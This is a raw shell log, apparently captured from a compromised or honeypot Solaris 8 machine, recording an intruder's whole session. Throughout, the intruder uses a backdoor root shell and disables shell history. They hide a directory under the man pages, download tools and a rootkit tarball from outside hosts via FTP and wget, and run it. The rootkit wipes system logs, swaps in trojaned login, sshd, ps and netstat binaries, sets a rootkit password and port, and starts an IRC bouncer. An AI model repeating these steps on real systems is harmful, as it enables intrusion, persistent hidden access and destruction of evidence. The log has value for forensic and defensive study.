bash-2.05$ cat attackcmds.txt  
# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773

# wget
wget: not found
#
w
  9:44am  up 13 day(s),  4:24,  0 users,  load average: 0.00, 0.00, 0.01
User     tty           [email protected]  idle   JCPU   PCPU  what
#
/bin/sh -i
unset HISTFILE

# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old

# # # ftp 62.211.66.16 21
bobzz

ftp: ioctl(TIOCGETP): Invalid argument
Password:
joka

get wget
get dlp
get solbnc
get iupv6sun

Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit

# ls
dlp
ipv6sun
solbnc
wget
#
chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
#
./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58--  http://62.211.66.53:80/bobzz/sol.tar.gz
           => `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar

    0K -> .......... .......... .......... .......... .......... [  2%]
   50K -> .......... .......... .......... .......... .......... [  5%]
  100K -> .......... .......... .......... .......... .......... [  8%]
  150K -> .......... .......... .......... .......... .......... [ 10%]
 200K -> .......... .......... .......... .......... .......... [ 13%]
  250K -> .......... .......... .......... .......... .......... [ 16%]
  300K -> .......... .......... .......... .......... .......... [ 19%]
  350K -> .......... .......... .......... .......... .......... [ 21%]
  400K -> .......... .......... .......... .......... .......... [ 24%]
  450K -> .......... .......... .......... .......... .......... [ 27%]
  500K -> .......... .......... .......... .......... .......... [ 29%]
  550K -> .......... .......... .......... .......... .......... [ 32%]
  600K -> .......... .......... .......... .......... .......... [ 35%]
  650K -> .......... .......... .......... .......... .......... [ 38%]
  700K -> .......... .......... .......... .......... .......... [ 40%]
  750K -> .......... .......... .......... .......... .......... [ 43%]
  800K -> .......... .......... .......... .......... .......... [ 46%]
  850K -> .......... .......... .......... .......... .......... [ 48%]
  900K -> .......... .......... .......... .......... .......... [ 51%]
  950K -> .......... .......... .......... .......... .......... [ 54%]
 1000K -> .......... .......... .......... .......... .......... [ 57%]
 1050K -> .......... .......... .......... .......... .......... [ 59%]
 1100K -> .......... .......... .......... .......... .......... [ 62%]
 1150K -> .......... .......... .......... .......... .......... [ 65%]
 1200K -> .......... .......... .......... .......... .......... [ 67%]
 1250K -> .......... .......... .......... .......... .......... [ 70%]
 1300K -> .......... .......... .......... .......... .......... [ 73%]
 1350K -> .......... .......... .......... .......... .......... [ 76%]
 1400K -> .......... .......... .......... .......... .......... [ 78%]
 1450K -> .......... .......... .......... .......... .......... [ 81%]
 1500K -> .......... .......... .......... .......... .......... [ 84%]
 1550K -> .......... .......... .......... .......... .......... [ 86%]
 1600K -> .......... .......... .......... .......... .......... [ 89%]
 1650K -> .......... .......... .......... .......... .......... [ 92%]
 1700K -> .......... .......... .......... .......... .......... [ 95%]
 1750K -> .......... .......... .......... .......... .......... [ 97%]
 1800K -> .......... .......... .......... ..........            [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

#
rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#
cd sol
sol: does not exist
#
./setup
./setup: not found
#
cd sol
sol: does not exist
#
tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè
     /\                                                /\
  _/  \    ___|   Autor: bobz    |___    /  \_
       \  /                                       \  /
        \/                                         \/

   ********
   ********            **     **      **
   **                  **    **      *  *
   ******* **********  **   **      *    *
   ******* **      **  ******      ********
        ** **      **  ******     **********
   ******* **      **  **   **    **      **
   ******* **      **  **    **   **      **
           **********  **     **  **      **
     /\                                              /\
  _/  \    ___| Autor: bobz    |___    /  \_
       \  /                                     \  /
        \/                                       \/

       ...:::[ Autore bobz ]:::...
  ...:::[ On IRcnEt On Join #bobz ]:::..

Ti:AmO:RosariADelete Logz...
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
* Checking for existing rootkits..
* checking /etc/rc2 and /etc/rc3 for rootkits...
* Rootkits Removed from config files
* checking crond configs for rootkits...
* Rootkits Removed from crond config files
*** WARNING *** 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password :

mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port :
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
 DTSCD PATCHED
 LPD PATCHED
 fingerd
 cmsd
 ttdbserverd
 sadmind
 statd
 rquotad
 rusersd
 cachefsd
 bindshells
 snmpXdmid
 Done.

--09:56:21--  ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
           => `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

    0K -> .......... .......... ......                           [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive:  111085-02.zip
   creating: 111085-02/
  inflating: 111085-02/.diPatch      
   creating: 111085-02/SUNWcsu/
  inflating: 111085-02/SUNWcsu/pkgmap  
  inflating: 111085-02/SUNWcsu/pkginfo  
   creating: 111085-02/SUNWcsu/install/
  inflating: 111085-02/SUNWcsu/install/checkinstall  
  inflating: 111085-02/SUNWcsu/install/copyright  
  inflating: 111085-02/SUNWcsu/install/i.none  
  inflating: 111085-02/SUNWcsu/install/patch_checkinstall  
  inflating: 111085-02/SUNWcsu/install/patch_postinstall  
  inflating: 111085-02/SUNWcsu/install/postinstall  
  inflating: 111085-02/SUNWcsu/install/preinstall  
   creating: 111085-02/SUNWcsu/reloc/
   creating: 111085-02/SUNWcsu/reloc/usr/
   creating: 111085-02/SUNWcsu/reloc/usr/bin/
  inflating: 111085-02/SUNWcsu/reloc/usr/bin/login  
  inflating: 111085-02/README.111085-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
--09:56:49--  ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
           => `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

    0K -> .......... .......... .......... .......... .......... [  4%]
   50K -> .......... .......... .......... .......... .......... [  9%]
  100K -> .......... .......... .......... .......... .......... [ 14%]
  150K -> .......... .......... .......... .......... .......... [ 19%]
  200K -> .......... .......... .......... .......... .......... [ 24%]
  250K -> .......... .......... .......... .......... .......... [ 29%]
  300K -> .......... .......... .......... .......... .......... [ 34%]
  350K -> .......... .......... .......... .......... .......... [ 39%]
  400K -> .......... .......... .......... .......... .......... [ 44%]
  450K -> .......... .......... .......... .......... .......... [ 49%]
  500K -> .......... .......... .......... .......... .......... [ 54%]
  550K -> .......... .......... .......... .......... .......... [ 59%]
  600K -> .......... .......... .......... .......... .......... [ 64%]
  650K -> .......... .......... .......... .......... .......... [ 69%]
  700K -> .......... .......... .......... .......... .......... [ 74%]
  750K -> .......... .......... .......... .......... .......... [ 79%]
  800K -> .......... .......... .......... .......... .......... [ 84%]
  850K -> .......... .......... .......... .......... .......... [ 89%]
  900K -> .......... .......... .......... .......... .......... [ 94%]
  950K -> .......... .......... .......... .......... .......... [ 99%]
 1000K -> ........                                               [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive:  108949-07.zip
   creating: 108949-07/
  inflating: 108949-07/.diPatch      
  inflating: 108949-07/postbackout   
   creating: 108949-07/SUNWdtbas/
  inflating: 108949-07/SUNWdtbas/pkgmap  
  inflating: 108949-07/SUNWdtbas/pkginfo  
   creating: 108949-07/SUNWdtbas/install/
  inflating: 108949-07/SUNWdtbas/install/checkinstall  
  inflating: 108949-07/SUNWdtbas/install/copyright  
  inflating: 108949-07/SUNWdtbas/install/depend  
  inflating: 108949-07/SUNWdtbas/install/i.none  
  inflating: 108949-07/SUNWdtbas/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbas/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbas/install/postinstall  
  inflating: 108949-07/SUNWdtbas/install/preinstall  
   creating: 108949-07/SUNWdtbas/reloc/
   creating: 108949-07/SUNWdtbas/reloc/dt/
   creating: 108949-07/SUNWdtbas/reloc/dt/lib/
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1  
   creating: 108949-07/SUNWdtbax/
  inflating: 108949-07/SUNWdtbax/pkgmap  
  inflating: 108949-07/SUNWdtbax/pkginfo  
   creating: 108949-07/SUNWdtbax/install/
  inflating: 108949-07/SUNWdtbax/install/checkinstall  
  inflating: 108949-07/SUNWdtbax/install/copyright  
  inflating: 108949-07/SUNWdtbax/install/depend  
  inflating: 108949-07/SUNWdtbax/install/i.none  
  inflating: 108949-07/SUNWdtbax/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbax/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbax/install/postinstall  
  inflating: 108949-07/SUNWdtbax/install/preinstall  
   creating: 108949-07/SUNWdtbax/reloc/
   creating: 108949-07/SUNWdtbax/reloc/dt/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1  
  inflating: 108949-07/postpatch     
  inflating: 108949-07/README.108949-07  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.

Installation of <SUNWdtbax> was successful.
Archive:  111606-02.zip
   creating: 111606-02/
  inflating: 111606-02/.diPatch      
   creating: 111606-02/SUNWftpu/
  inflating: 111606-02/SUNWftpu/pkgmap  
  inflating: 111606-02/SUNWftpu/pkginfo  
   creating: 111606-02/SUNWftpu/install/
  inflating: 111606-02/SUNWftpu/install/checkinstall  
  inflating: 111606-02/SUNWftpu/install/copyright  
  inflating: 111606-02/SUNWftpu/install/i.none  
  inflating: 111606-02/SUNWftpu/install/patch_checkinstall  
  inflating: 111606-02/SUNWftpu/install/patch_postinstall  
  inflating: 111606-02/SUNWftpu/install/postinstall  
  inflating: 111606-02/SUNWftpu/install/preinstall  
   creating: 111606-02/SUNWftpu/reloc/
   creating: 111606-02/SUNWftpu/reloc/usr/
   creating: 111606-02/SUNWftpu/reloc/usr/sbin/
  inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd  
  inflating: 111606-02/README.111606-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of <SUNWftpu> was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README  Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16

# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-.  ,-.,---.,--. ,-.,----.
 |  O ||  ,-' \ \/ / | o ||   \| || ,--'
 |  _/ _\  \   \  /  | o< | |\   || |__  
 |_|  |____/   |__|  |___||_|  \_| \___|
      Version 2.2.1 (c) 1999-2000
              the most psychoid          
      and  the cool lam3rz Group IRCnet  
                                         
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>

# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
    root   167     1  0   Nov 16 ?        0:00 /usr/sbin/inetd -s
    root  3325  3265  0 10:02:25 ?        0:00 grep inetd
---
Patch.....
Attivata by RyO
# #